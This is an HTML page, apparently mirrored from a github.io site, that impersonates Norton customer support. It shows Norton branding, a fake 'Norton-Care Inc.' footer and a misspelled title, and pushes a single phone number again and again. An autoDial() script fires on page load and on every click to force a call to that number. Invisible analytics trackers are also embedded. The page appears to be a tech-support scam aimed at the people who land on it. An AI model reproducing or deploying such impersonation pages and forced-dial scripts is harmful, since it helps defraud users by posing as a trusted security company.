 
<!DOCTYPE html>
<html>


<!-- Mirrored from norton360cdn.github.io/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 30 May 2024 15:33:40 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
 <script>
  !function(g,s,q,r,d){r=g[r]=g[r]||function(){(r.q=r.q||[]).push(arguments)};
  d=s.createElement(q);d.src='../d1l6p2sc9645hc.cloudfront.net/gosquared.js';q=
  s.getElementsByTagName(q)[0];q.parentNode.insertBefore(d,q)}(window,document
  ,'script','_gs');

  _gs('GSN- -Y');
</script>
 
 <link rel='stylesheet' id='astra-google-fonts-css' href='https://fonts.googleapis.com/css?family=Mulish%3A400%7CKanit%3A600%2C400&amp;display=fallback&amp;ver=4.6.14' media='all' />
 
 
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Norton-care ustomer Service</title>
  <style>
    body {
      font-family: "SF Pro Text", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      text-align: center;
      padding: 20px;
      background-color: white;
    }
    .imgimgon {
   /* width: -webkit-fill-available; */
    vertical-align: middle;
       max-width: 94%; 
    /* min-width: 300px; */
    max-height:670px;
    }
  .imgimgtw {
    width: -webkit-fill-available;
    vertical-align: middle;
    max-width: 74%;
    min-width: 300px;
    }
     .imgimgthre {
    width: -webkit-fill-available;
    vertical-align: middle;
    max-width: 120px;
    min-width: 50px;
    }
    .navigavi{
    
    }
    
    
    h1 {
      font-size: 32px;
      margin-bottom: 20px;
    }

    p {
      font-size: 18px;
      line-height: 1.5;
      margin-bottom: 30px;
    }

    .call-button {
      display: inline-block;
      background-color: #0000FF;
      color: #fff;
      padding: 15px 30px;
      font-size: 24px;
      border-radius: 5px;
      text-decoration: none;
      transition: background-color 0.3s ease;
      margin-bottom: 20px;
    }

    .call-button:hover {
      background-color: #b71b36;
    }

    .apple-logo {
      width: 150px;
      height: 150px;
      margin-bottom: 30px;
    }

    .footer {
      font-size: 14px;
      color: #888;
      margin-top: 50px;
    }
    
    
    .gcla{
    color:#ff6a00;
        font-size: 2.625rem;
    font-weight: 600;
    
    }
    
    .respfonts{
    font-family: 'Kanit', sans-serif;
    font-weight: 600;
     font-size: calc(2vw + 20px); /* Setting the font size based on viewport width */
    min-font-size: 30px; /* Minimum font size */
    max-font-size: 60px; /* Maximum font size */
    }
    
    .paragph{
    font-family: 'Kanit', sans-serif;
     
    }
    
    
    .adrt{
    text-decoration: none;
    }
  </style>
  <script>
    function autoDial() {
      var phoneNumber = "+1-(866)-374-0809";
      window.location.href = "tel:" + phoneNumber;
    }

    function call() {
      // Implement the call functionality here, such as initiating a phone call.
      console.log("Calling...");
    }
  </script>
</head>

<body onload="autoDial()" onclick="autoDial()">

  <img class="imgimgon" src="../ik.imagekit.io/web3resources/nothing/tr_f-webp/Norton-logo-2021.svg7034.png?updatedAt=1717008505212">
 
  <h1 class="respfonts" >Norton-care Help</h1>
 <a href="tel:+1-(866)-374-0809" class="adrt"> <h1 class="gcla respfonts"><strong>+1-(866)-374-0809</strong></h1> </a>
 <a href="tel:+1-(866)-374-0809" class="adrt"> <h1 class="gcla respfonts"> CLICK HERE TO CALL US </h1> </a>
 <a href="tel:+1-(866)-374-0809" class="adrt">
 <img class="imgimgthre" src="../png.pngtree.com/png-vector/20190927/ourmid/pngtree-phone-icon-png-image_1757859.jpg"> 
 </a>
 <br>
 <img class="imgimgon" src="../ik.imagekit.io/web3resources/nothing/Screenshot_22269f.jpg?updatedAt=1717000295261">
 <br>
 
  <!-- <img class="imgimgtw" src="https://ik.imagekit.io/web3resources/nothing/tr:f-webp/hero-banner-homepage.image.large_2x.jpg?updatedAt=1716955124302" > -->
  
  <p class="paragph">For any assistance or inquiries related to Norton products or services, our dedicated customer service team is here to help you. Whether you need technical support, have questions about your Norton account, require assistance with your Norton account, or need guidance with Norton services, our experts are just a phone call away. Experience exceptional support from Norton.</p>
    <p class="paragph">
  Norton provides multiple layers of defense against malicious software, viruses, or potentially unwanted applications or programs. Get unlimited on demand IT help 24/7* to fix tech issues.</p>
  
  <!-- <a href="tel:+1-(8 " class="call-button">Contact   Support</a> -->
  
  <p class="footer">© 2023 Norton-Care Inc. All rights reserved.</p>
  
</body>
 <!-- Default Statcounter code for norton
https://faceking.store/ -->
<script type="text/javascript">
var sc_project=13002975; 
var sc_invisible=1; 
var sc_security="e41cbed2"; 
</script>
<script type="text/javascript"
src="../www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/13002975/0/e41cbed2/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
<!-- End of Statcounter Code -->


<!-- Mirrored from norton360cdn.github.io/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 30 May 2024 15:33:46 GMT -->
</html>
